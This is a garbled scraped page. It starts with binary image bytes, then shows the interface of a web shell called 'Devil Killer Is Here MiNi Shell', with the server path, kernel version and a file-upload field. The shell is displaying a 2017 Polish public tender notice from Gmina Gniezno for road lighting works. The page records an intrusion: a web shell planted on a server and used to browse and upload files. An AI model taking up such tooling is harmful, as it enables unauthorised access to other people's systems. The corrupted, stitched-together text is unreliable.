JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170425/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170425/73608-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://' target='_blank'>http://</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 73608 - 2017
              z dnia 2017-04-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Gniezno: Budowa oświetlenia drogowego w miejscowościach: Dalki, Ganina, Goślinowo, Jankowo Dolne, Klina, Lubochnia, Mnichowo, Pyszczyn, Wełnica i Szczytniki Duchowne <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Gniezno, krajowy numer identyfikacyjny
              63125951900000, ul.
              Al. Reymonta 
              42624,
              62200  
              Gniezno, woj.
              wielkopolskie, państwo
              Polska, tel.
              614 245 750, e-mail
              sekretariat@urzadgminy.gniezno.pl, faks
              614 245 751.
              <br />
              Adres strony internetowej (URL): www.urzadgminy.gniezno.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />www.urzadgminy.gniezno.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa oświetlenia drogowego w miejscowościach: Dalki, Ganina, Goślinowo, Jankowo Dolne, Klina, Lubochnia, Mnichowo, Pyszczyn, Wełnica i Szczytniki Duchowne <br /><b>Numer referencyjny: </b>UG.271.10.017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Budowa oświetlenia drogowego w miejscowościach Dalki, Goślinowo, Jankowo Dolne, Kalina, Lubochnia Mnichowo, Pyszczyn, Wełnica i Szczytniki Duchowne na terenie gminy Gniezno, w ramach niniejszych robót przewiduj się wykopy, budowę linii kablowej oświetleniowej, budowę szafek oświetleniowych budowę słupów oświetleniowych, budowę tabliczek bezpiecznikowych, budowę opraw świetlnych,budowę uziomów i wykonanie pomiarów elektrycznych.   <br /><br /><b>II.5) Główny kod CPV: </b>45316110-9<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenia zamówienia uzupełniającego, o którym mowa w art. 67 ust. 1 pkt. 6  Pzp  do wysokości 50  % wartości zamówienia podstawowego. <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/09/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi,                      wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia 
niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz 
informacją o podstawie do dysponowania tymi osobami;  
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                      Warunek ten zostanie spełniony, jeżeli Wykonawca posiada dokumenty potwierdzające, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności związanej                          z przedmiotem zamówienia na sumę gwarancyjną min. : 
 Zadanie nr 1 Dalki   40 000,00 zł 
Zadanie nr 2 Ganina dz. 52   30 000,00   zł 
Zadanie nr 3 Ganina dz. 45  30 000,00  zł 
Zadanie nr 4 Goślinowo dz. 390, 391  20 000,00 zł 
Zadanie nr 5 Jankowo Dolne dz. 462, 490, 414, 447   50 000,00 zł 
Zadanie nr 6 Kalina dz. 4,132, 133, 134/2  5 000,00 zł 
Zadanie nr 7  Lubochnia dz. 3/14, 3/24, 2, 3/43, 3/77, 3/87, 4  40 000,00 zł 
Zadanie nr 8 Mnichowo dz. 5/2, 4/11, 10/3  80 000,00 zł 
Zadanie nr 9  Pszczyn dz. 26/2, 34/2, 27/50  40 000,00 zł 
Zadanie nr 10 Wełnica os. Wichrowe Wzgórza  20 000,00 zł 
Zadanie nr 11 Wełnica os. Rzeczne i w Dolinie  20 000,00 zł 
Zadanie nr 12 Wełnica os. Pogodne i Strumykowe  30 000,00 zł 
Zadanie nr 13 Szczytniki Duchowne dz. 77, 76/4  10 000,00 zł 
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)	wykonał, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie 1 robotę polegającą  na budowie : 
Zadnie nr 1 Dalki 
wykonał 1 robotę polegająca na budowie oświetlenia drogowego  na kwotę  60 000,00 zł 
Zadanie nr 2 Ganina dz. 52 
 wykonał jedną robotę budowlaną polegającą na budowie oświetlenia drogowego  na kwotę 40 000,00zł
 Zadanie nr 3 Ganina dz. 45
Wykonał jedną robotę budowlaną polegającą na budowie oświetlenia drogowego  na kwotę 40 000,00zł 
Zadanie nr 4 Goślinowo dz. 390 i 391 
Wykonał jedną robotę budowlaną polegająca na budowie sieci wodociągowej na kwotę 25 000,00 zł Zadanie nr 5 Jankowo Dolne dz. 462, 490, 414, 447 
Wykonał jedną robotę budowlaną polegająca na budowie oświetlenia drogowego  na kwotę            65 000,00 zł 
Zadanie nr 6 Kalina dz. 4, 132, 133, 134/2 
Wykonał jedną robotę budowlaną polegająca na budowie oświetlenia drogowego  na kwotę            7 000,00 zł 
Zadanie nr 8 Mnichowo dz. 5/2, 4/11, 10/3 
Wykonał jedną robotę budowlaną polegająca na budowie oświetlenia drogowego  na kwotę            90 000,00 zł 


Zadanie nr 9 Pyszczyn dz. 26/2, 34/2, 27/50 
Wykonał jedną robotę budowlaną polegająca na budowie oświetlenia drogowego  na kwotę            55 000,00 zł 
Zadanie nr 10  Wełnica os. Wichrowe Wzgórza 
Wykonał jedną robotę budowlaną polegająca na budowie oświetlenia drogowego  na kwotę            30 000,00 zł 
Zadanie nr 11  Wełnica os.  Rzeczne i w Dolinie 
Wykonał jedną robotę budowlaną polegająca na budowie oświetlenia drogowego  na kwotę            30 000,00  zł 
Zadanie nr 12 Wełnica os. Pogodne i Strumykowe 
Wykonał jedną robotę budowlaną polegająca na budowie oświetlenia drogowego  na kwotę            45 000,00 zł 
Zadanie nr 13 Szczytniki Duchowne dz. 77, 76/4 
Wykonał jedną robotę budowlaną polegająca na budowie oświetlenia drogowego  na kwotę            12 000,00 zł 
potwierdzonych referencjami poświadczających ich prawidłowe i terminowe wykonanie. 
W przypadku ubiegania się o wszystkie zamówienia należy przedłożyć wykonanie robót  na łączną wartość 579 000,00  zł 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">aktualnego zaświadczenia właściwego Naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 1.2 aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 1.3 odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wypisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy; 1.4 oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej ( załącznik nr 6 ) ;w
przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. - Wykonawca, w terminie 3 dni od zamieszczania na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23. Wraz ze
złożeniem oświadczenia wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencjo w postępowaniu o udzielenie zamówienia</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oferta winna zawierać: 1. Formularz ofertowy (załącznik nr 1), Oświadczenie, o którym mowa w pkt.III.3) (załącznik nr 2), - Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku
istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu.. - Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu zamieszcza informacje o podwykonawcach w oświadczeniu. - W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia. 3.Zobowiązanie innego podmiotu (załącznik nr 7) albo inny dokument, służący wykazaniu udostępnienia wykonawcy potencjału przez podmiot trzeci w zakresie określonym w art. 22a
ust.1 ustawy Pzp. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Zamawiający żąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art.22a ustawy Pzp, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w . 4.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt III.4) 1.1.-1.3. - składa dokument lub dokumenty wystawione w Kraju,w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: a) nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł  porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, b) nie otwarto jego likwidacji ani nie ogłoszono upadłości. 5. Dokumenty, o których mowa w pkt 4 lit. b, powinny być
wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 4. lit. a, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu.
6.Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 4, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Zapis pkt 5 stosuje się. 7. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów odpowiednio kraju, w
którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, o udzielenie niezbędnych informacji dotyczących tego dokumentu.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
